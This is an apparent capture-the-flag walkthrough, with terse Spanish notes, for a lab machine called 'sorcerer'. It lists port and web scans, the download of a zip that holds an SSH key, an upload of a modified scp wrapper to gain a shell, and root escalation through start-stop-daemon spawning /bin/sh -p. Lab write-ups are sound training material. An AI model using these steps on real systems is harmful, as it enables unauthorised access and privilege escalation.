nmap -A -p- -oA sorcerer 192.168.77.100 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sorcerer 192.168.77.100

nmap -sU -O -p- -oA sorcerer-udp 192.168.77.100

nikto -h 192.168.77.100:80

Pasted image 20211102131211.png

Pasted image 20211102131701.png

Vamos a http://192.168.77.100

Pasted image 20211102131642.png

whatweb Vamos a http://192.168.77.100:8080

Pasted image 20211102131728.png

Vamos a http://192.168.77.100:7742/zipfiles

Pasted image 20211102133502.png

unzip max.zip

chmod 600 /home/max/.ssh/id_rsa

Pasted image 20211102134557.png

vim /home/max/scp_wrapper.sh

Pasted image 20211102134521.png

Modificamos scp_wrapper.sh

Pasted image 20211102135049.png

chmod 600 home/max/.ssh/id_rsa

mv home/max/.ssh/id_rsa home/cu3rv0x/.ssh

scp home/max/scp_wrapper.sh max@192.168.77.100:/home/max/scp_wrapper.sh

ssh max@192.168.77.100

Pasted image 20211102135147.png

/usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p

Pasted image 20211102135926.png

boxes

copyright©2022 Cu3rv0x all rights reserved